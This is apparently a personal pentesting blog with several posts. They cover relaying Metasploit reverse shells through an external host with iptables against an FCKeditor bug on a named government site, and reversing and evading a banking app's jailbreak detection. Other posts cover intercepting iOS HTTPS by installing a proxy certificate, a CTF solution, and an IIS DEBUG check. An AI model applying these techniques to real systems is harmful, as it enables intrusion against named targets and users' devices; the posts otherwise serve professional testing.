Art of Pentesting: NAT to NAT attack with metasploit

As a follower of the "only way to exploit is Metasploit" we often encounter situation where most servers are behind NAT . In order for the exploitable server to be successful connected back to the attacker machine in a typical pentest workaround is by forcing  the exploitable server to make a reverse_tcp payload back to the attacker machine.

However this technique require several weakness:

- The attacker need to have an ext.PI

- The attacker would be in trouble if he is also in a NAT  enviroment..

- The attacker Network have limited open ports.

A fakap situation

Solving the issue can be done in two ways..

1. Thinkering with your company policy to allowed port forwarding to the internal IP

2. Using an external IP interfacing box as a trampoline point to our internal network..

We used an external Box as our trampoline point. You could install metasploit on the server but that may violated blax3 policy plus consume a lot resources.

P.O.C of attack

Suppose we found a CFM FCKeditor bugs  on chaah.gov.my , we can easily deploy the exploit as it is.

But the tricky part is the payload settings. On my Settings i have this type of connection.

My Setup.

1. Setup VPN or Poor Man VPN on your external box

2. Redir traffic for one port on the external box to your own internal VPN IP:port
3. Exploit


Setting up the metasploit payload..

On your external Box u can use iptables to redirect traffic

 iptables -t nat -A PREROUTING -p tcp --dport 6767-j DNAT --to-destination 192.168.6.14:6767 (Owned interface VPN IP)

Back to metasploit here is the jewel crown.. we set  ReverseListenerBinAddress to our own VPN IP.

.... And the ritual begin

IOS Application Pentesting Series Part 2: What's inside an IPA?

Apple might be the greatest evil born as a byproduct by  the current capitalist system.  Love them, loathe them they are here to stay. And so we continue to part 2 explaining the IOS application architecture.  Like major Unix Distribution, the IOS Application (or compiled files) is archived in the IPA formats (Which is actually a zip format).

There are two ways to obtained the ipa files. If you are a developers then u can the particular ipa from the developer itself. Else the only way to obtained the ipa is by cracking the application itself. The Hackulo team has written a nice wiki explaining the whole process of decrypting the binary at runtime.


What is the strucutre of a IPA Files? Let's take a look at the Maybank2u Apps structure ..

As you can see the common structure of an mobile-web applicationIPA  usually consist of:

Payload/

Payload/application.app


And a few Plist file. Plist is actually a property file which use DSO that can use to stored binary human-readable data .

So what can we find in an apps? A lot of stuff. Suppose we are interested in finding out how does an app aware that the IOS have been jailbreak or not? In the Maybank2u Apps if we explore the plugin folder:

There's a javascript file called CheckRoot. However it doesn`t yield us too much how exactly the checking mechanism works.  So what we can do is we can fire our IDA and load our Apps. Do take not that the APPs are compile in a Mach-O for Arm . So what we can do is in IDA is find the particular function that is correspond to the CheckRoot.

Click on the names will yield..

The Apps will check the existance of each file and return a 1 if exist.. Since we know that the application determine that jailbreak had occured if any of those file detected a Jailbreak Iphone can actually evade the detection by simply wriite off a hooking function to return each check as Bool 0 .

We will discuss it later on Part 3 or maybe 4.. 

IOS Application Pentesting Series: Part1 (Non Jailbreak method)..

At Scan we always find out new weird toys to play with. Recently we were assigned to do a penetration test on a IOS Mobile Application. Now before we begin , pentesting an IOS Mobile Application is not the same as Jailbreaking from the IOS Firmware..

While jail breaking is pretty much focusing on exploiting core-application and the IOS architecture itself, we shift our focus to the IOS Application itself, the one that needs to be compiled with Xcode, Signed it and push it via Itunes or Appstores..

As a note, it is important to test the application on the IOS Devices itself rather then the simulator since code compile for the simulator is translated into a x86  while our IOS is a baby little ARM.

While Android is famous for it's android static page we haven`t see much how the Application resides in the IOS Architecture..

Most commercial application is actually programmed as a precompiled dedicated browser to access their data on the WebServer.. in short words, mobile web application.. We say web because it's using HTTP/HTTPS as a transportation to exchange resources for example Maybank2u and GSCMobile.

In normal web application pentest you would normally use Paros, ZAP or BurpSuite as our intercepting proxy. However in an IOS enviroment, self-signed cert will be rejected from the IOS Application by default! This is due to the way NSURLConnection API have it's own way of validating SSL Cert.( It's a good features to reduce MiTM attack on an IOS Devices).

So how do we solve this dillema? Simple Just install our self-signed cert into the IOS and mark it as trusted...

1. Generate our Dynamic SSL With ZAP  and save the cert file.

2. Host it up on temporary webserver and point our safari to the location that we save our cert file.

3. On Safari click on our Cert will lead us to this particular page..

4. Now all your HTTPS IOS app belong to us...

............Noted all of this can be done without jailbreaking your IOS Devices and lets keep it that way since that's the way we would like to see how secure is the application on a default settings. ...

P/S: You could combing it in a social engineering attack using a rogue AP redirect to a landing page forcing the user to install the cert but that's another topic.

We continue on part 2 later.... now dah kawin malas nak tulis panjangx2.

MISTI JOhor 2012 CTF Writeoff when in ROme do in ROme

So once again, the awesome SCAN Associates Berhad with collaboration of MISTI Johor had organized quick/mini CTF Competition in the southern land of Malaysia. Pan Pac JB few weeks ago.  While I was not able to conduct the competition on the scene directly since I`m busied with my marriage  (oh yeah marriage is life way more important and rewardable if u know what i meant :p) .

So I managed to rip-off /rewrite back the Score Servers in Ruby and hardened it thanks to the power of Apache... in Malaysia CTF how do u predict a winner? Simple.. u only have three choice by   either

1. UTP *   - That means if geng alak/kage
2. UTM *  - That means geng kuehtiow
3. MMU * - Well what do u expect? it's MMU there should be plenty of nerds and geeks.
4. UITM * - Urm, yeah, well u know .... they win sometimes right?


Final Score.

Owh my BFF hacker/trainer friends ask me to write out one of the question. Since I`m in a good mood (dah jadi husband) So let`s go to one question.... Question 7

SO what happen when someone actually connect to the port?

You will actually get something sounds gibberish

Since we know it's something gibberish. Let's analyze the traffic with Wireshsark. with and Follow the TCP Stream.

Hurm,... Since it`s not ASCII readable let`s try EBCDIC?

Hurm,... Since it`s not ASCII readable let`s try EBCDIC?

Hohoho. to answer the servers require us to write a simple client that we encode our data  into EBCDIC to send and Decode back in ASCII when recv from the server.

A quick dirty unelegent but works anyway.. in python

Now Test it !!

So answer is c6bf8061e6ece9aff707ddaf666db3b50983fd32
Since I`m in a good mood , I release the source code i used for the server..


http://pastebin.com/dcuTjjtd

Owh congrats to MMU Biyatch..

Check for DEBUG Verb in IIS

PCI  Compliance is an asshole misleading compliance created by some capitalist junkies to say u r secure!!! ... In my opinion it`s a full of shit but yeah everyone gotta comply with it  to ensure our shareholders or investors that we are secured for digital business althought http://www.technewsworld.com/story/64926.html says otherwise.

Having said that one of PCI -C is to disbaled Debug mode on the webserver. IIS/ASP by default didn`t turn on DEBUG mode. But you know developers :)
To test for DEBUG verb in IIS/ASP  u can run command like this with curl.

curl  -H "Command: stop-debug" -X DEBUG http://index/foo.asp   # can be foo.asp or foo.aspx

If it returns.

OK

So DEBUG is enabled and need to be turned off.

A screenshot example

How to disable DEBUG: http://support.microsoft.com/kb/815157

I`m married.

Married.

Geek stuff that I do during our marriage?

Transfering contact from ancient Nokia C3 to Android via Google SyncMl.

rand() facts and forgots.

• When issuing fork(). The memory layout will be rebased as the same as Parents. All you need is a memory leak somewhere that points to a pointer ( perhaps save ebp?)\
• It doesn`t matter if ur issuing print statement in php/perl/python/ruby/java --> in the end it's always point to a plt in C.
• Owh I`m getting married How coold is that?